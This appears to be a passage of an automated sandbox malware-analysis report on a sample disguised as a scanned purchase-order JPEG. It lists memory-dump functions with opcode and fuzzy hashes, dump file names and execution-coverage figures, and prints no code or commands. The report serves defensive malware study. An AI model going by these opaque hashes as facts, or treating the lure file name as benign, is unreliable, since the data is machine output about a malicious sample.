                                                                                                        • Instruction ID: e22d9391e400453955534365066bf059b979d37aa78b68f1ee5466176af119b7
                                                                                                        • Opcode Fuzzy Hash: 30c918be84f8243eccdadf9997da23c08df21054c4d70e51006f8d36f4d73375
                                                                                                        • Instruction Fuzzy Hash: 6E411530A04259EFCB11CF68C804B6FBBF2FB54304F04846AE9158B252DB79DE49CB51
                                                                                                        Function 01225658 Relevance: .1, Instructions: 101COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: eab61874ea1400e867f097fb047d0ee6420487baf34f16a423dd097914010466
                                                                                                        • Instruction ID: e4274df3ee1adc268cad745cc4412bf44c018678b8dc9e233c43edf334f30144
                                                                                                        • Opcode Fuzzy Hash: eab61874ea1400e867f097fb047d0ee6420487baf34f16a423dd097914010466
                                                                                                        • Instruction Fuzzy Hash: 9431737165111AEFCF069FA4E854ABF3BA2FB48304F008424F9169B394CB75CD61DB91
                                                                                                        Function 01228370 Relevance: .1, Instructions: 88COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dbe8afa3faa5f5ae79864a31c6efccd8632cc86c3843da6c3328499bf2c50cbe
                                                                                                        • Instruction ID: 2d764f7dcf51d7961c8123c57b4e04cf9555913d171305f02c23c5079352cd35
                                                                                                        • Opcode Fuzzy Hash: dbe8afa3faa5f5ae79864a31c6efccd8632cc86c3843da6c3328499bf2c50cbe
                                                                                                        • Instruction Fuzzy Hash: 792107717202226BDF2A1739C858A7E2AE7EFC4749B14403DD606CB3A5EE75CC02D782
                                                                                                        Function 01228380 Relevance: .1, Instructions: 87COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0c71f0235ed45ae587255f551aac2111063d934c2a70a6cfd5223e8586ac4c2d
                                                                                                        • Instruction ID: 202d3bbdaa1c19d267048494c68be2a06f24ae485bc77c6d0564143ef7aa3234
                                                                                                        • Opcode Fuzzy Hash: 0c71f0235ed45ae587255f551aac2111063d934c2a70a6cfd5223e8586ac4c2d
                                                                                                        • Instruction Fuzzy Hash: 0821C231320222ABEB295629C454B7E76D7EFC4748F14843DD606CB795EE75CC42D382
                                                                                                        Function 01222790 Relevance: .1, Instructions: 86COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b83bb6c201ec711fef4eb31fa6e0fe2428a5c4f2fe42a381dcc62929ba425f32
                                                                                                        • Instruction ID: 34df68f3744f1d6cfdb25c289bbe7bfc7e1e99afbe412be8fada4a89dbcd1999
                                                                                                        • Opcode Fuzzy Hash: b83bb6c201ec711fef4eb31fa6e0fe2428a5c4f2fe42a381dcc62929ba425f32
                                                                                                        • Instruction Fuzzy Hash: FD313470D05219CFCB05EFA8D9486EEBBB4FF49304F00416AD804BA264EB354A85CBA2
                                                                                                        Function 012262F0 Relevance: .1, Instructions: 77COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 87734cd364f5a273c65d07e1bdd3bcffe62aa129962e5e0af03c80cfa8a20146
                                                                                                        • Instruction ID: 0cdbca2514d0a75dace21ea61d9ba7ed89128c95f13dee04723473dd7a274107
                                                                                                        • Opcode Fuzzy Hash: 87734cd364f5a273c65d07e1bdd3bcffe62aa129962e5e0af03c80cfa8a20146
                                                                                                        • Instruction Fuzzy Hash: 8421F236B15522AFDB2A9B29D45462EB7A2FFC9B557084569E906CF394CF30CC028780
                                                                                                        Function 012228F0 Relevance: .1, Instructions: 77COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: de6c2865f08602aa9a1bd071248c64e51f4bfe797c90eb8de6541990a90db73c
                                                                                                        • Instruction ID: 396e1154057501b36e918875500fbf3494a616746b5fd156b27ea72ab7eed509
                                                                                                        • Opcode Fuzzy Hash: de6c2865f08602aa9a1bd071248c64e51f4bfe797c90eb8de6541990a90db73c
                                                                                                        • Instruction Fuzzy Hash: B621B071B10116EFCB14DF38C440AEE37A5EB9D6A4B20C419D94A9B340DB35EA03CBD2
                                                                                                        Function 0111D044 Relevance: .1, Instructions: 72COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4130896351.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_111d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 90f14bf4eb319ea3b2ebc1fe229cec949bc910cbb5929efab200b6e823adb2c2
                                                                                                        • Instruction ID: a185ac56a180a71209596b1ae559d4ab3fe4f24414cd3c80619b508bb8eb12b5
                                                                                                        • Opcode Fuzzy Hash: 90f14bf4eb319ea3b2ebc1fe229cec949bc910cbb5929efab200b6e823adb2c2
                                                                                                        • Instruction Fuzzy Hash: F8213771504204DFCF19DF68E9C8B26FB65FB84314F20C6BDE8494B25AC736D846CA62
                                                                                                        Function 01224285 Relevance: .1, Instructions: 68COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8b98c012bf04a66bff292997e190f5648ad68448adc97c218c0dd5af58083c41
                                                                                                        • Instruction ID: 1891c42f428a7e357e2dccbe83ede3e12777a059e444642235ce6d1633a20f1b
                                                                                                        • Opcode Fuzzy Hash: 8b98c012bf04a66bff292997e190f5648ad68448adc97c218c0dd5af58083c41
                                                                                                        • Instruction Fuzzy Hash: F931B379E11209DFCB04EFA8E58899DBBB2FF49304B208469E819AB324D731AD45CF40
                                                                                                        Function 01225649 Relevance: .1, Instructions: 67COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d04de1f4ccdc1908ae718e6b2796e9501f062720c61cd5cd3f1d399d93f5ab2d
                                                                                                        • Instruction ID: 38571e8d527f76efe3049c5e6ec0d50420054ef2189f5dbf747af21ccfec9859
                                                                                                        • Opcode Fuzzy Hash: d04de1f4ccdc1908ae718e6b2796e9501f062720c61cd5cd3f1d399d93f5ab2d
                                                                                                        • Instruction Fuzzy Hash: 9221C231A1511ADFCF169F68E448BBF3BA1EB48214F008028E9158B395CB74CD61CB91
                                                                                                        Function 01229761 Relevance: .1, Instructions: 65COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 51c8cdb1af25f355b91d46cfbbdffe194ecfb2ab6bdee6ce5adf03a2f0f8bb2f
                                                                                                        • Instruction ID: bad9234d717def5c114657d4346cf6ced6ecd04b34e7631259586796871f80e7
                                                                                                        • Opcode Fuzzy Hash: 51c8cdb1af25f355b91d46cfbbdffe194ecfb2ab6bdee6ce5adf03a2f0f8bb2f
                                                                                                        • Instruction Fuzzy Hash: 69217C70E01269EFDF09CFA5D550AEEBFB6EF49209F148069E511EA290DB30D981CB20
                                                                                                        Function 0122F640 Relevance: .1, Instructions: 60COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c382893d8f67e2535037873042ef968859db01b74bf1a79dc819f29b035aad84
                                                                                                        • Instruction ID: 8adcc1df30f69afa8c5ebafeb4182f41eb9dc81bd047e4f57619c254261a38dc
                                                                                                        • Opcode Fuzzy Hash: c382893d8f67e2535037873042ef968859db01b74bf1a79dc819f29b035aad84
                                                                                                        • Instruction Fuzzy Hash: 5E215BB0D0020A9FDB05EFB9D58079EBFB2FB84704F1095A9D1589B369EB705A498F81
                                                                                                        Function 01226300 Relevance: .1, Instructions: 59COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f896bcb6a637eab19a8cb87fa229418f0208b3e9b84959277288d0331a067f1e
                                                                                                        • Instruction ID: bd4b81237a80ba1ccd3c8d027847a43ca3cab4cc05b0eca6face4b26b40d0965
                                                                                                        • Opcode Fuzzy Hash: f896bcb6a637eab19a8cb87fa229418f0208b3e9b84959277288d0331a067f1e
                                                                                                        • Instruction Fuzzy Hash: 3D11E536711522AFDB155B2AD454A3EB7A6FFC9A553080568EA06CF360CF31DC028790
                                                                                                        Function 012227F0 Relevance: .1, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 094fa16c93e2045723a95e1de471b441f837b75b9d1e50691ce2953cbb966115
                                                                                                        • Instruction ID: 15a2bea6fc488ed130c5e91a7cf0714dd72511ac741135e4bfa7a05a64240e9c
                                                                                                        • Opcode Fuzzy Hash: 094fa16c93e2045723a95e1de471b441f837b75b9d1e50691ce2953cbb966115
                                                                                                        • Instruction Fuzzy Hash: C221C274D0520ACFCB41EFA9D9486EEBBF4FF09310F10566AD809B6210EB355A95CBA1
                                                                                                        Function 0122F650 Relevance: .1, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b0cf968e845ce56c6c16ed8ab3382137703a7ad22715b57e21907e1399e275f0
                                                                                                        • Instruction ID: c91ba170c477e003a635de9f2b8d9c18988860909297fde6ed1d1574cbc0a475
                                                                                                        • Opcode Fuzzy Hash: b0cf968e845ce56c6c16ed8ab3382137703a7ad22715b57e21907e1399e275f0
                                                                                                        • Instruction Fuzzy Hash: FF110AB0D0010ADFDB44EFB9D68079EBBF2FB84704F109569D1589B369EB705A458F81
                                                                                                        Function 0111D03F Relevance: .1, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4130896351.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_111d000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                        • Instruction ID: 872dba23a885069567c4dd5ecf8f82546de764eaecc6624bed0a17c1775b5960
                                                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                        • Instruction Fuzzy Hash: 4E11DD75504284CFDB16CF68D9C8B16FFA2FB84314F24C6AAD8494B256C33AD44ACF62
                                                                                                        Function 01225E98 Relevance: .0, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b3e95cd12bc5c985c554e8985be8ce1d649c8a3a0d94acfde732909152c6c643
                                                                                                        • Instruction ID: a15e40ab268134ced5f3173fc0a7a5903a39868ab8907ff8b268d0ee06af5ed8
                                                                                                        • Opcode Fuzzy Hash: b3e95cd12bc5c985c554e8985be8ce1d649c8a3a0d94acfde732909152c6c643
                                                                                                        • Instruction Fuzzy Hash: B501D872B101196FDF159EA898107FF3FA7EBD8250F19C029F515D7284DE758D118B90
                                                                                                        Function 0122ABE0 Relevance: .0, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ce54b9bb00cfee0607772f93bec6003c014d5551a6e13bf31b9d1c59ff66fe1a
                                                                                                        • Instruction ID: ace547381cbe967786c9ce01578fe3b1d8fe947348e459a16143e9b11b86b1b2
                                                                                                        • Opcode Fuzzy Hash: ce54b9bb00cfee0607772f93bec6003c014d5551a6e13bf31b9d1c59ff66fe1a
                                                                                                        • Instruction Fuzzy Hash: 2DF0F6313102215B9B165A2E9454A2EBADEEFC8A553054079EB09CBB61EE61CC03C780
                                                                                                        Function 0122E8E8 Relevance: .0, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d7d93ecf71a4d0a0718c6e229992923eb46136f4e848bd4b9e23f3db265a81f1
                                                                                                        • Instruction ID: 231cfd017b1dc504f540228a4921be998bd1b586cfe63f9199f5294ffddf3cd9
                                                                                                        • Opcode Fuzzy Hash: d7d93ecf71a4d0a0718c6e229992923eb46136f4e848bd4b9e23f3db265a81f1
                                                                                                        • Instruction Fuzzy Hash: A1014CB6D0020A9FDB40DFA8E840AEEBBB1FB48305F408426D924A3354D7345A56DF91
                                                                                                        Function 012228AA Relevance: .0, Instructions: 20COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d71e64b0c9b8291c99779a1cbfbb2589971e390d6b2cf9b768bf4f9ebcf84451
                                                                                                        • Instruction ID: 1428b39ce8d8940ae79ea65acce2f6f9a703e40898f714df10a79bb7a8275342
                                                                                                        • Opcode Fuzzy Hash: d71e64b0c9b8291c99779a1cbfbb2589971e390d6b2cf9b768bf4f9ebcf84451
                                                                                                        • Instruction Fuzzy Hash: 40E0C231E2012B96CB009FB0E8444EEF734EFD5365B414626D46436000EF30265AC6A2
                                                                                                        Function 012228B0 Relevance: .0, Instructions: 19COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 40302450c079fdbe49d7aa17274c92d3877c36d88314aa6dacbc659bfc2da007
                                                                                                        • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                                        • Opcode Fuzzy Hash: 40302450c079fdbe49d7aa17274c92d3877c36d88314aa6dacbc659bfc2da007
                                                                                                        • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                                                        Function 01228EF8 Relevance: .0, Instructions: 18COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                        • Instruction ID: fcb8a843448708659d8bebbbdef9633d419110d7e64250a10c084c35321d8f7a
                                                                                                        • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                        • Instruction Fuzzy Hash: 8DC0123321C1383BA225104E7C41EABAB8DC2C12B4AA10137FB1C93241AC829C8001A8
                                                                                                        Function 01226739 Relevance: .0, Instructions: 17COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e905c21d1e5c1b6faacbb3790f4e672a43b713373dff75bac5d933ffbccb5ff4
                                                                                                        • Instruction ID: a0702a367468fd456fc213708f58c3c1bc590bb5fe16eaeee6e23135a62b6996
                                                                                                        • Opcode Fuzzy Hash: e905c21d1e5c1b6faacbb3790f4e672a43b713373dff75bac5d933ffbccb5ff4
                                                                                                        • Instruction Fuzzy Hash: 12D02B33C483414FCB06A3B0DC453987F31EB40218B05D630D0010929FDE74C84A8B00
                                                                                                        Function 0122D6D4 Relevance: .0, Instructions: 16COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3867bbbd4fafaecd1d9f7a01365d57275f00531196113b15b81a8701b3944d96
                                                                                                        • Instruction ID: 6fe3c2ba3c55d29d2ab872fae2662cb567a40d2e9747f0174b0e6eb6639ab98d
                                                                                                        • Opcode Fuzzy Hash: 3867bbbd4fafaecd1d9f7a01365d57275f00531196113b15b81a8701b3944d96
                                                                                                        • Instruction Fuzzy Hash: 4BD0E234E4000CCFCF20DFA8E4844DCBB70EB88321B10542AD825A7210D63054608F00
                                                                                                        Function 0122AFAD Relevance: .0, Instructions: 16COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a322065f1989ab37216c9b671b4cd38db4a1303a1de51019cc081db53329b5ae
                                                                                                        • Instruction ID: de6fc5870e7a2729dfba59e4de045720fc9647e3547e896ac755829eed931d74
                                                                                                        • Opcode Fuzzy Hash: a322065f1989ab37216c9b671b4cd38db4a1303a1de51019cc081db53329b5ae
                                                                                                        • Instruction Fuzzy Hash: 51D0173AB40008DFCF008F88E8408DDF7B6FB98220B048116E911A3260C6319921CB50
                                                                                                        Function 01226748 Relevance: .0, Instructions: 12COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9d6a8c122b17f6e9860733d239b2a311f8ff2b7e8384d477e8ffd708c70e8636
                                                                                                        • Instruction ID: ef5176c3bbd42dc3885976d4793f3bfafaafb3f1d8dbb4c07949f84e8cfbcdb8
                                                                                                        • Opcode Fuzzy Hash: 9d6a8c122b17f6e9860733d239b2a311f8ff2b7e8384d477e8ffd708c70e8636
                                                                                                        • Instruction Fuzzy Hash: FAC08031C843094FC905F7B5FD49759776EFAC060C740863090050A75DDFB4DC994790

                                                                                                        Non-executed Functions

                                                                                                        Function 01226920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.4131286835.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_1220000_Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                        • API String ID: 0-3001612457
                                                                                                        • Opcode ID: b4b717de0cb85246b02628affec97f3f1621879a4806efe071c59f805d240191
                                                                                                        • Instruction ID: de05b0f41446a36651393edf69391eb6a16ea42917a93c1dd7c2c786ada9a5e6
                                                                                                        • Opcode Fuzzy Hash: b4b717de0cb85246b02628affec97f3f1621879a4806efe071c59f805d240191
                                                                                                        • Instruction Fuzzy Hash: A501D432760126EFCB248E2CC544AAD37EBAF88A607254469EA46CF3B5DE71DC418740

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:10.3%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:1.5%
                                                                                                        Total number of Nodes:195
                                                                                                        Total number of Limit Nodes:7
